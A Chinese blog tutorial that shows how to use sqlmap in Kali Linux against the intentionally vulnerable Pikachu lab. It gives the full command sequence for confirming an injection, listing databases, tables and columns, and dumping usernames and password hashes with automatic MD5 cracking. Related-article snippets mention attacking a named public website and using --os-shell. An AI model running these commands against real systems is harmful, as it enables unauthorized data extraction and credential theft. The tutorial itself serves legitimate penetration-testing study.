kali工具SQLmap基本使用方法流程以及命令解析

最新推荐文章于 2024-07-15 15:39:35 发布
最新推荐文章于 2024-07-15 15:39:35 发布
阅读量5.9k 收藏 57
点赞数 5
文章标签: 后端 web安全 sql 数据库 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/FRANXX_02/article/details/127180052
版权

这边来详细写一篇SQLmap工具的使用方法,这边借用了pikachu里sql注入类的字符形注入

 首先sql注入肯定要先找注入点在哪里,我们在输入栏里输入admin试试

 看到有向后台查询的get请求,然后直接放到sqlmap里试一下

sqlmap -u "http://172.16.107.243/pikachu/vul/sqli/sqli_str.phpname=admin&submit=%E6%9F%A5%E8%AF%A2"

注意:-u后面的URL链接一定要加双引号,不加的话有时候get请求里会有(&)这个符号不加双引号的URL链接有这个符号就会报错

如果URL正确的话他会出现很多如下图的选项,这些可以按需要选择,如果看不懂的话可以全都输入y,然后按回车就可以了

 如果出现下图这些信息,那么恭喜你该网站存在sql注入漏洞,就可以进行下一步操作,如果提示报错的话,可以看情况修改URL,或者该网站不存在sql 注入漏洞

经过上一步可以看出来,改网站存在sql注入漏洞,那么可以进行下一步,查询数据库了 

sqlmap -u "http://172.16.107.243/pikachu/vul/sqli/sqli_str.php?name=admin&submit=%E6%9F%A5%E8%AF%A2" -dbs

 -bds的意思就是查询该网站后台所有数据库

然后就出来了改后台所有的数据库,我们对pikachu这个库进行下一步,查看该数据库里所有的表 

sqlmap -u "http://172.16.107.243/pikachu/vul/sqli/sqli_str.php?name=admin&submit=%E6%9F%A5%E8%AF%A2" -D pikachu -tables

 -D的意思就是指定查询改数据库,-tables的意思就是查询该数据库内所有的表

 查询出改表内有五个表,我们对敏感表users进行下一步,查询表内字段

sqlmap -u "http://172.16.107.243/pikachu/vul/sqli/sqli_str.php?name=admin&submit=%E6%9F%A5%E8%AF%A2" -D pikachu -T users -columns

 -T的意思是指定指定某数据的表,-columns是列出该表所有的字段名

 我们进行对敏感信息,username,password进行下一步查询

sqlmap -u "http://172.16.107.243/pikachu/vul/sqli/sqli_str.php?name=admin&submit=%E6%9F%A5%E8%AF%A2" -D pikachu -T users -C username,password -dump

 -C是指定字段,-dump是列出这段内信息

 这里就看到账号密码了,sql数据库默认是对密码MD5加密的,sqlmap有个功能可以把列出来的密码自动解密,如下图,这个选项选了yes的话就会对密码解密

 如果对sqlmap这个工具有其他需求的话,可以使用sqlmap -help,来查看他其他命令选项。

Strelizia_XX
关注
  • 5
    点赞
  • 57
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
如何在kali Linux中使用sqlmap工具
gaomei2009的专栏
06-20 1741
post请求中参数为 uname=admin*&passwd=test&submit=Submit。第一步:先判定kali Linux中sqlmap能够正常使用。在kali linux中,使用sqlmap,如上图。先遍历出数据库类型和所有的表。第二步:抓取某个页面的登陆数据包,如下。指定数据库表名sql10051008。
7.12、SQLmap—自动化渗透测试工具kali linux)
qq_33782021的博客
01-16 1523
sglmap是一个开源的渗透测试工具,可以用来进行自动化检测,利用SQL注入漏洞,获取数据库服务器的权限。
SQLMAP教程,零基础入门到精通,一篇就够了!
最新发布
程序员阿飘 的博客
07-15 776
这些选项可以用来创建用户自定义函数`--udf-inject 注入用户自定义函数`` ` `--shared-lib=SHLIB 共享库的本地路径`
kali工具sqlmap使用教程
qq_52805176的博客
07-13 3931
渗透测试工具sqlmap的简单使用
kali中的sqlmap使用
yishuihanwyf的博客
12-01 944
kalisqlmap中的简单使用
kali-sqlMap使用技巧
HKkkkkSky的博客
09-20 759
SQL 注入是一种代码渗透技术,是最常用的网络黑客技术之一。SQL 注入非常危险,可能会导致数据库中的数据被暴露,甚至被损坏。
kali linux下sqlmap使用教程
龙卷风摧毁停车场
03-30 1万+
SQLMAP 有windows和linux两个版本使用,可跨系统进行操作,语法参数都相同,此处以kali linux为例进行操作 sqlmap --version 查看sqlmap版本 sqlmap -h 查看sqlmap帮助 sqlmap -hh 查看sqlmap高级帮助 使用sqlmap连接数据库 查看数据库banner信息 sqlmap -d "mysql://root:123456@47.208.229.216:3306/tiantianbao" -f --banner 查看数据库用户 sql
kali基于sqlmap使用
ztK63LrD的博客
04-27 8870
kaliSQLmap
sqlmapkali中的应用及ctfhub实战
2301_77004573的博客
07-08 1323
工具一把嗦固然方便,但仍不能忽视对原理的理解,毕竟常有sqlmap跑不出来的题目,为了检验自己对sql注入的掌握情况,之后也会补一篇手工注入的文章。
kali sqlmap使用笔记
N1ce_peter的blog
05-16 1088
kali sqlmap使用笔记一、-u 判断数据库类型二、获取目标所有数据库。功能快捷键合理的创建标题,有助于目录的生成如何改变文本的样式插入链接与图片如何插入一段漂亮的代码片生成一个适合你的列表创建一个表格设定内容居中、居左、居右SmartyPants创建一个自定义列表如何创建一个注脚注释也是必不可少的KaTeX数学公式新的甘特图功能,丰富你的文章UML 图表FLowchart流程图导出与导入导出导入 参考资料 https://www.cnblogs.com/aeolian/p/11021796.html
SQLmap使用教程图文教程(超详细)
热门推荐
wangyuxiang946的博客
06-20 4万+
SQLmap是一款自动化SQL注入工具kali自带。路径 /usr/share/sqlmap 一、目标 1、指定url 2、指定文件(批量检测) 3、指定数据库/表/字段 4、post请求 5、cookie注入 二、脱库 1、获取数据库 2、获取表 3、获取字段 4、获取字段类型 5、获取值(数据) 6、获取用户 7、获取主机名 8、搜索库、表、字段。 9、正在执行的SQL语句 三、WAF绕过
sqlmap 入门级使用
梦落红尘
06-21 3万+
虽然我用过mssql和oracle,但表示只是用过,不是很熟,所以本文大多数都在说MySQL数据库。 一、数据库 数据库管理系统  ->  数据库(可能存在多个) ->   表(一般一个数据库中都存储多个表) -> 字段  (一般一个表中都有多个字段) 也就是说:一般都是一对多的关系,这里就不深究了,我们先来看看表(tables)的结构。    这是从phpmyadmin中截取的
kali工具使用sqlmap教程
J546283791的博客
10-25 300
首先kali自带sqlmap:尝试一下sqlilab第一关:结果:尝试查询数据库:出现:尝试查询security下的所有表:结果:尝试查users下的所有字段:结果尝试爆破各字段所有条目:
Kali-工具-sqlmap常见用法
weixin_44257023的博客
07-19 2891
Kali-工具-sqlmap常见用法
sqlmap 使用笔记(kali环境)
qq_40691438的博客
02-10 1810
sqlmap默认把session文件跟结果文件保存在output文件夹下,用此参数可自定义输出路径 例如:–当请求是HTTPS的时候,需要配合–force-ssl参数来使用,或者可以在Host头后面加上:443。在有些时候web服务器使用了伪静态,导致无法直接使用sqlmap测试参数,可以在想测试的参数后面加*用–os-shell参数也可以模拟一个真实的shell,可以输入你想执行的命令。输出的格式可定义为:CSV,HTML,SQLITE。参数:–os-cmd,–os-shell。文件内容直接copy。
kalisqlmap应用实战
m0_37422153的博客
03-31 6391
前言 好久没有玩kali,都说kali玩的好,局子进的早,今天打算用sqlmap来获取某个悲催网站的管理员账号和密码,www.bible-history.com这个就是传说中经常被攻击的网站,今天就拿它开刀。 实践 sqlmap工具通常都是用sql自动注入来获取网站管理员密码。点击https://www.bible-history.com/subcat.php这个网址跳转的网站界面如下: 点击ht...
渗透工具——kaliSQLMap简介
2301_78006725的博客
09-02 811
首先,SQLMap是一个自动化的SQL注入工具,其主要功能是扫描、发现、利用给定URL的SQL注入漏洞,内置了很多绕过插件,支持的数据库有MySQL, Oracle,PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird,Sybase和SAP MaxDB。3. 基于报错注入,即页面会返回错误信息,或者把注入的语句的结果直接返回在页面中;4. 联合查询注入,可以使用union的情况下的注入;
kali linux里利用SQLmap实现SQL注入
2201_76034619的博客
06-28 5983
安全等级调为low进入SQL Injection(Blind)页面。
Kali工具库之sqlmap
辰鬼的博客
05-17 3859
自动SQL注入工具。 原文: SYNOPSIS python3 sqlmap [options] 意译: 选项: -h, --help 显示基本帮助信息并退出 -hh 显示高级帮助信息并退出 --version 显示程序的版本号并退出 -v VERBOSE 详细程度:0-6(默认为1) 目标: 必须提供这些选项中的至少一个来定义目标 -u URL, --url=URL 目标网址(例如“ http://www.s
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Strelizia_XX

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值